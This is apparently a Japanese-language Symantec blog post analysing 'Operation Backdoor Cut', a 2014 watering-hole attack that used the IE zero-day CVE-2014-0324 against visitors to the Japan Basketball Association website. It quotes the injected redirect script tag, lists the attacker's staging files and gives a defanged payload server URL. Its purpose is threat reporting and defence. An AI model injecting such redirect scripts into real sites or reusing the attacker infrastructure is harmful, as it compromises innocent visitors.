Desktop Email Encryption

IE のゼロデイ脆弱性を悪用してバスケットボール界を狙った「Operation Backdoor Cut」 

05-08-2014 02:58 AM

今年 3 月、シマンテックは Internet Explorer 8 のゼロデイ脆弱性、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」を悪用した水飲み場型攻撃の可能性についてブログでお伝えしました。シマンテックはこの攻撃について調査を続け、この攻撃の目的が日本のバスケットボール界に関係のあるユーザーを狙うことにあったと結論付け、これを「Operation Backdoor Cut(オペレーションバックドアカット)」と命名しました。こうした結論を導き出すことができたのは、長期にわたり観測した結果、この脆弱性を悪用した水飲み場型攻撃が、日本バスケットボール協会(JBA)の公式サイトのランディングページだけをホストとして利用していることが判明したためです。3 月にこのゼロデイ脆弱性が確認されて以降、シマンテックの遠隔測定では、これ以外の Web サイト上で攻撃は確認されていません。

figure1_21.png
図 1. JBA のランディングページ

JBA の Web サイトが最初に侵害されたのは 2 月中旬のことです。サイトの HTML コードに悪質なスクリプトがインジェクトされ、このスクリプトによってバックグラウンドで外部サイトから悪用コードがロードされていました。その後、このサイトは正常化されたように見えましたが、2 月下旬には再び侵害され、同様のスクリプトがインジェクトされました。そして、3 月 11 日にマイクロソフト月例パッチとして CVE-2014-0324 に対するパッチがリリースされてからわずか数時間後に、三たび悪質なスクリプトがインジェクトされます。この 3 回とも、JBA サイトにインジェクトされたのは、悪用コードをホストしている、さらに別の侵害された Web サイトにトラフィックをリダイレクトするための短いスクリプトです。この Web サイトの所在地は韓国のソウルです。この攻撃で使われているスクリプトの例を次に示します。

<script type="text/javascript" src="https://www.[削除済み].kr/uc/inc_jba.php"></script>

侵害されて実際に悪用コードをホストしていたのは、韓国の大手カフェチェーンに関連する Web サイトです。3 回の侵入のたびに、このサイトの別々のディレクトリにファイルが保存されていました。このサイトが、攻撃のメイン部分のホストとして選ばれたのは、著名な企業のサイトであり、企業のネットワークを監視しているセキュリティ製品やサービスから嫌疑をかけられる可能性が低いためでしょう。各ディレクトリに含まれるファイルは、以下のとおりです。

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

JBA の Web サイトにインジェクトされた短いスクリプトによって、inc_jba.php ファイルに誘導されます。このファイルには、標的となったユーザーのコンピュータ環境(オペレーティングシステム(OS)のバージョン、OS の言語、インストールされている Microsoft Office のバージョンなど)の情報をチェックする JavaScript が含まれています。この JavaScript は、cookie をチェックとして使う前に、ブラウザがこのページにアクセスしたことがあるかどうかも確認します。過去にアクセスしたことがある場合、ブラウザは悪用コードに誘導されません。これは、ユーザーがセキュリティ研究者である場合を警戒した対策です。コンピュータ環境が、指定された条件を満たしている場合、ブラウザは 4 つの悪用ページのいずれかにリダイレクトされます。悪用コードは、環境に応じて次の 4 つの亜種が用意されています。

  • Windows XP - 英語(EN)
  • Windows XP - 日本語
  • x86 コンピュータの Windows 7 に Office 2007 がインストール
  • x86 コンピュータの Windows 7 に Office 2010 がインストール

実行に成功すると、悪用コードは同じディレクトリから inc_module.jpg をダウンロードして実行し、最終的なペイロードの URL を取得します。拡張子は .jpg ですが、これは画像ファイルではなく、実際にはペイロードの場所について暗号化された情報を含むデータファイルです。ブラウザは、ソウルにある別のサーバーにリダイレクトされますが、これは攻撃者が SSL プロトコルでネットワークトラフィックを暗号化して用意したものと考えられます。ソウルに置かれているサーバーの URL は以下のとおりです。

https://login[ドット]imicrosoft[ドット]org/feed

このサイトが、北京に拠点を置く企業によってレンタルされている仮想プライベートサーバー(VPS)上で管理されていた点は注目に値します。この企業は、米国と韓国にある VPS を提供することを業務にしているようです。このプロバイダが選ばれたのは、サーバーの位置情報によるものと思ってまず間違いないでしょう。ペイロードをホストしているサーバーの Geo-IP 位置情報が、攻撃の成否を左右したはずだからです。

figure2_20.png
図 2. VPS サイトのログイン画面

攻撃者は、早々に撤収して短期間で攻撃活動を終わらせる戦略を取ったか、あるいはセキュリティ研究者がペイロードをダウンロードできないようにする高度な侵入手法を編み出したか、いずれかだったと考えられます。いずれにしても、このサーバーからペイロードを取得することはできませんでした。

シマンテックが確認した限りでは、「Operation Backdoor Cut」の動機は JBA を水飲み場サイトとして利用して、そこからのトラフィックを誘導することだけだと思われます。なぜなら、他の Web サイトはまったく影響を受けていないからです。悪質なスクリプトファイルの名前(inc_jba.php)と、ページへのアクセスカウントに使われた cookie の名前(JBA20140312v2)は、どちらも JBA ページの一部であるかのように偽装されています。シマンテックがこの悪用について確認した検出結果はすべて、JBA の Web サイトからのトラフィックでした。

バスケットボール界が狙われた理由
なぜ日本のバスケットボール界が今回の標的になったのか不思議に思う方もいるでしょう。スポーツ界は国民とも政府とも深く結び付いており、バスケットボールもその例外ではありません。日本のバスケットボール界と日本政府との間には、いささか興味深い関係があります。JBA の会長は、日本の現副総理兼財務大臣です。しかも、元総理大臣でもあります。このような関係こそ、JBA サイトに水飲み場型攻撃が仕掛けられた動機かもしれません。つまり、JBA の Web サイトが、日本政府への格好の侵入口またはゲートウェイと見なされたのかもしれません。

オリンピックが動機という可能性もあります。主要なスポーツ団体のひとつである JBA は、2020 年東京オリンピックの統括機関である東京オリンピック・パラリンピック競技大会組織委員会と密接な関係があります。オリンピック関連組織が頻繁にサイバースパイ活動の標的になることは、よく知られています。たとえば 2011 年、「Operation Shady RAT」と命名された攻撃を調査したときのデータでも、いくつかのオリンピック関連組織が攻撃を受け、そのネットワークのコンピュータが侵入を受けたことが判明しています。日本オリンピック委員会(JOC)も、このとき被害を受けました。日本は昨年、2020 年のオリンピック開催地に選ばれ、現在その準備を進めています。オリンピック開催地という名誉と引き換えにサイバー攻撃が増える可能性については、日本でも十分に認識されています。実際、日本政府は今から 6 年後に開催されるオリンピック大会に備えて、サイバーセキュリティ演習を 3 月に実施したところです。しかし、攻撃はすでに始まっているかもしれず、この演習よりも前にとっくに始まっていた可能性すらあります。

政府機関、製造業、金融などの業種は標的になりやすいと言えますが、標的型攻撃を受けるリスクはどの業種でも変わりません。そのことを認識して、相応にネットワークを保護することが重要です。企業や組織は、準備を怠らず、万一ネットワークに攻撃者の侵入を許してしまった場合の対策を講じておく必要があります。

シマンテックは、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」から保護するために、以下の検出定義ファイルを提供しています。

ウイルス対策

侵入防止システム

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。

Statistics
0 Favorited
0 Views
0 Files
0 Shares
0 Downloads

Tags and Keywords

Related Entries and Links

No Related Resource entered.